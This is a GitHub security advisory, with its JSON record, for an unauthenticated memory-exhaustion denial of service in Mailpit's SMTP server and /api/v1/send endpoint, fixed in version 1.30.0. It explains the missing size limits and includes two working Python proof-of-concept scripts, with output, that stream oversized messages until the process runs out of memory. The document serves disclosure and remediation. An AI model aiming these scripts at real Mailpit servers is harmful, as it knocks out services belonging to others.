Search criteria
Related vulnerabilities
GHSA-FPXJ-M5Q8-FPHW
Vulnerability from github – Published: 2026-05-19 15:54 – Updated: 2026-05-19 15:54
VLAI
Summary
Mailpit: Unauthenticated remote memory-exhaustion DoS via unlimited SMTP DATA and /api/v1/send body sizes
Details
Summary
The Mailpit SMTP server has a Server.MaxSize int field that controls the maximum allowed DATA payload size, but the field is never assigned anywhere outside test code, leaving it at Go's zero value (0 ⇒ "no limit"). The same applies to the HTTP /api/v1/send endpoint, whose request body is decoded with json.NewDecoder(r.Body) and no http.MaxBytesReader. Because Mailpit's default listeners bind [::]:1025 (SMTP) and [::]:8025 (HTTP), with no authentication required on either, a single network-reachable attacker can push an arbitrarily large message into Mailpit and watch RAM consumption spike with a ~7-10× amplification factor (raw frame → enmime envelope tree → search-text index → zstd-encoded write to SQLite). Repeating the attack — or running it concurrently from multiple connections — drives the process to OOM-kill.
Details
Pre-auth, remote DoS on every Mailpit deployment running the default configuration. Memory is the primary axis; disk is a secondary one, because each oversized message is also persisted to the SQLite store (config.MaxMessages caps the count at 500 but never the bytes — so 500 attacker-sized messages × 1 GiB each = ~500 GiB on the host disk before the LRU rotates).
Affected code internal/smtpd/smtpd.go:107 — the field exists:
type Server struct {
...
MaxSize int // Maximum message size allowed, in bytes
...
}
internal/smtpd/smtpd.go:863-877 — the enforcement is gated on > 0:
for {
...
line, err := s.br.ReadBytes('\n')
if err != nil {
return nil, err
}
if bytes.Equal(line, []byte(".\r\n")) {
break
}
if line[0] == '.' {
line = line[1:]
}
if s.srv.MaxSize > 0 { // ← only when set
if len(data)+len(line) > s.srv.MaxSize {
_, _ = s.br.Discard(s.br.Buffered())
return nil, maxSizeExceeded(s.srv.MaxSize)
}
}
data = append(data, line...) // ← otherwise grows unbounded
}
internal/smtpd/main.go:223-248 — the field is never populated; grep -rn "MaxSize" cmd/ config/ returns zero hits. There is no --smtp-max-message-size CLI flag, no MP_SMTP_MAX_MESSAGE_SIZE env var.
server/apiv1/send.go:45-52 — HTTP path has the same defect:
decoder := json.NewDecoder(r.Body)
data := sendMessageParams{}
if err := decoder.Decode(&data.Body); err != nil {
httpJSONError(w, err.Error())
return
}
No r.Body = http.MaxBytesReader(w, r.Body, N) wrapper; server.ReadTimeout of 30 s is transmission-time, not body-size-budget.
PoC
Baseline RSS on a freshly-started binary: 25 MiB. After one 100 MiB SMTP DATA block: ~1 037 MiB (≈10× amplification, single connection, no auth):
#!/usr/bin/env python3
# poc-smtp-dos.py
import socket, sys
host, port = sys.argv[1], int(sys.argv[2])
mb = int(sys.argv[3]) # message size, MiB
s = socket.create_connection((host, port), timeout=120)
def r(): return s.recv(4096).decode("latin-1", "replace").strip()
print(r())
for cmd in [b"HELO x\r\n",
b"MAIL FROM:<a@b.com>\r\n",
b"RCPT TO:<c@d.com>\r\n",
b"DATA\r\n"]:
s.sendall(cmd); print(r())
s.sendall(b"Subject: oversize\r\n\r\n")
chunk = b"X" * (1024 * 1024)
for _ in range(mb): s.sendall(chunk)
s.sendall(b"\r\n.\r\n")
print(r()); s.close()
$ python3 poc-smtp-dos.py 127.0.0.1 1025 100
220 hostname Mailpit ESMTP Service ready
250 hostname greets x
250 2.1.0 Ok
250 2.1.5 Ok
354 Start mail input; end with <CR><LF>.<CR><LF>
250 2.0.0 Ok: queued as 58rI69JTJYjVFwogEbw9Jj
$ ps -o rss= -p $(pgrep -f /usr/local/bin/mailpit)
1062848 # ≈ 1 037 MiB, up from 25 MiB baseline
Equivalent over HTTP:
# poc-http-dos.py
import socket, sys
host, port, mb = sys.argv[1], int(sys.argv[2]), int(sys.argv[3])
prefix = b'{"From":{"Email":"a@b.com"},"To":[{"Email":"c@d.com"}],"Subject":"big","Text":"'
suffix = b'"}'
N = mb * 1024 * 1024
clen = len(prefix) + N + len(suffix)
s = socket.create_connection((host, port), timeout=120)
s.sendall(
b"POST /api/v1/send HTTP/1.1\r\n"
b"Host: x\r\n"
b"Content-Type: application/json\r\n"
b"Content-Length: " + str(clen).encode() + b"\r\n"
b"Connection: close\r\n\r\n")
s.sendall(prefix)
chunk = b"X" * (1024 * 1024)
for _ in range(mb): s.sendall(chunk)
s.sendall(suffix)
print(s.recv(500).decode("latin-1", "replace"))
$ python3 poc-http-dos.py 127.0.0.1 8025 200
HTTP/1.1 200 OK
...
$ ps -o rss= -p $(pgrep -f /usr/local/bin/mailpit)
2147000 # comfortably above 2 GiB on the same process
Five concurrent SMTP connections × 50 MiB each took the same machine from 25 MiB → 1 970 MiB during the attack window. With sufficient bandwidth the only ceiling is host RAM.
Impact
Unauthenticated remote attackers can send arbitrarily large emails via SMTP or HTTP, causing unbounded memory and disk growth, leading to out-of-memory (OOM) kills and full Mailpit process crash (DoS)
Severity
7.5 (High)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/axllent/mailpit"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.30.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-45713"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-19T15:54:12Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\nThe Mailpit SMTP server has a Server.MaxSize int field that controls the maximum allowed DATA payload size, but the field is never assigned anywhere outside test code, leaving it at Go\u0027s zero value (0 \u21d2 \"no limit\"). The same applies to the HTTP /api/v1/send endpoint, whose request body is decoded with json.NewDecoder(r.Body) and no http.MaxBytesReader. Because Mailpit\u0027s default listeners bind [::]:1025 (SMTP) and [::]:8025 (HTTP), with no authentication required on either, a single network-reachable attacker can push an arbitrarily large message into Mailpit and watch RAM consumption spike with a ~7-10\u00d7 amplification factor (raw frame \u2192 enmime envelope tree \u2192 search-text index \u2192 zstd-encoded write to SQLite). Repeating the attack \u2014 or running it concurrently from multiple connections \u2014 drives the process to OOM-kill.\n\n### Details\nPre-auth, remote DoS on every Mailpit deployment running the default configuration. Memory is the primary axis; disk is a secondary one, because each oversized message is also persisted to the SQLite store (config.MaxMessages caps the count at 500 but never the bytes \u2014 so 500 attacker-sized messages \u00d7 1 GiB each = ~500 GiB on the host disk before the LRU rotates).\n\n\nAffected code\n[internal/smtpd/smtpd.go:107](https://github.com/axllent/mailpit/blob/develop/internal/smtpd/smtpd.go#L107) \u2014 the field exists:\n\n```\ntype Server struct {\n ...\n MaxSize int // Maximum message size allowed, in bytes\n ...\n}\n```\n[internal/smtpd/smtpd.go:863-877](https://github.com/axllent/mailpit/blob/develop/internal/smtpd/smtpd.go#L863-L877) \u2014 the enforcement is gated on \u003e 0:\n\n```\nfor {\n ...\n line, err := s.br.ReadBytes(\u0027\\n\u0027)\n if err != nil {\n return nil, err\n }\n if bytes.Equal(line, []byte(\".\\r\\n\")) {\n break\n }\n if line[0] == \u0027.\u0027 {\n line = line[1:]\n }\n\n if s.srv.MaxSize \u003e 0 { // \u2190 only when set\n if len(data)+len(line) \u003e s.srv.MaxSize {\n _, _ = s.br.Discard(s.br.Buffered())\n return nil, maxSizeExceeded(s.srv.MaxSize)\n }\n }\n data = append(data, line...) // \u2190 otherwise grows unbounded\n}\n```\n[internal/smtpd/main.go:223-248](https://github.com/axllent/mailpit/blob/develop/internal/smtpd/main.go#L223-L248) \u2014 the field is never populated; grep -rn \"MaxSize\" cmd/ config/ returns zero hits. There is no --smtp-max-message-size CLI flag, no MP_SMTP_MAX_MESSAGE_SIZE env var.\n\n[server/apiv1/send.go:45-52](https://github.com/axllent/mailpit/blob/develop/server/apiv1/send.go#L45-L52) \u2014 HTTP path has the same defect:\n\n```\ndecoder := json.NewDecoder(r.Body)\ndata := sendMessageParams{}\nif err := decoder.Decode(\u0026data.Body); err != nil {\n httpJSONError(w, err.Error())\n return\n}\n```\n\nNo r.Body = http.MaxBytesReader(w, r.Body, N) wrapper; server.ReadTimeout of 30 s is transmission-time, not body-size-budget.\n\n### PoC\nBaseline RSS on a freshly-started binary: 25 MiB. After one 100 MiB SMTP DATA block: ~1 037 MiB (\u224810\u00d7 amplification, single connection, no auth):\n\n```\n#!/usr/bin/env python3\n# poc-smtp-dos.py\nimport socket, sys\nhost, port = sys.argv[1], int(sys.argv[2])\nmb = int(sys.argv[3]) # message size, MiB\n\ns = socket.create_connection((host, port), timeout=120)\ndef r(): return s.recv(4096).decode(\"latin-1\", \"replace\").strip()\nprint(r())\nfor cmd in [b\"HELO x\\r\\n\",\n b\"MAIL FROM:\u003ca@b.com\u003e\\r\\n\",\n b\"RCPT TO:\u003cc@d.com\u003e\\r\\n\",\n b\"DATA\\r\\n\"]:\n s.sendall(cmd); print(r())\ns.sendall(b\"Subject: oversize\\r\\n\\r\\n\")\nchunk = b\"X\" * (1024 * 1024)\nfor _ in range(mb): s.sendall(chunk)\ns.sendall(b\"\\r\\n.\\r\\n\")\nprint(r()); s.close()\n```\n\n```\n$ python3 poc-smtp-dos.py 127.0.0.1 1025 100\n220 hostname Mailpit ESMTP Service ready\n250 hostname greets x\n250 2.1.0 Ok\n250 2.1.5 Ok\n354 Start mail input; end with \u003cCR\u003e\u003cLF\u003e.\u003cCR\u003e\u003cLF\u003e\n250 2.0.0 Ok: queued as 58rI69JTJYjVFwogEbw9Jj\n\n$ ps -o rss= -p $(pgrep -f /usr/local/bin/mailpit)\n1062848 # \u2248 1 037 MiB, up from 25 MiB baseline\n```\n\nEquivalent over HTTP:\n\n```\n# poc-http-dos.py\nimport socket, sys\nhost, port, mb = sys.argv[1], int(sys.argv[2]), int(sys.argv[3])\nprefix = b\u0027{\"From\":{\"Email\":\"a@b.com\"},\"To\":[{\"Email\":\"c@d.com\"}],\"Subject\":\"big\",\"Text\":\"\u0027\nsuffix = b\u0027\"}\u0027\nN = mb * 1024 * 1024\nclen = len(prefix) + N + len(suffix)\n\ns = socket.create_connection((host, port), timeout=120)\ns.sendall(\n b\"POST /api/v1/send HTTP/1.1\\r\\n\"\n b\"Host: x\\r\\n\"\n b\"Content-Type: application/json\\r\\n\"\n b\"Content-Length: \" + str(clen).encode() + b\"\\r\\n\"\n b\"Connection: close\\r\\n\\r\\n\")\ns.sendall(prefix)\nchunk = b\"X\" * (1024 * 1024)\nfor _ in range(mb): s.sendall(chunk)\ns.sendall(suffix)\nprint(s.recv(500).decode(\"latin-1\", \"replace\"))\n```\n\n```\n$ python3 poc-http-dos.py 127.0.0.1 8025 200\nHTTP/1.1 200 OK\n...\n$ ps -o rss= -p $(pgrep -f /usr/local/bin/mailpit)\n2147000 # comfortably above 2 GiB on the same process\n\n```\n\nFive concurrent SMTP connections \u00d7 50 MiB each took the same machine from 25 MiB \u2192 1 970 MiB during the attack window. With sufficient bandwidth the only ceiling is host RAM.\n\n### Impact\nUnauthenticated remote attackers can send arbitrarily large emails via SMTP or HTTP, causing unbounded memory and disk growth, leading to out-of-memory (OOM) kills and full Mailpit process crash (DoS)",
"id": "GHSA-fpxj-m5q8-fphw",
"modified": "2026-05-19T15:54:12Z",
"published": "2026-05-19T15:54:12Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/axllent/mailpit/security/advisories/GHSA-fpxj-m5q8-fphw"
},
{
"type": "PACKAGE",
"url": "https://github.com/axllent/mailpit"
},
{
"type": "WEB",
"url": "https://github.com/axllent/mailpit/releases/tag/v1.30.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Mailpit: Unauthenticated remote memory-exhaustion DoS via unlimited SMTP DATA and /api/v1/send body sizes"
}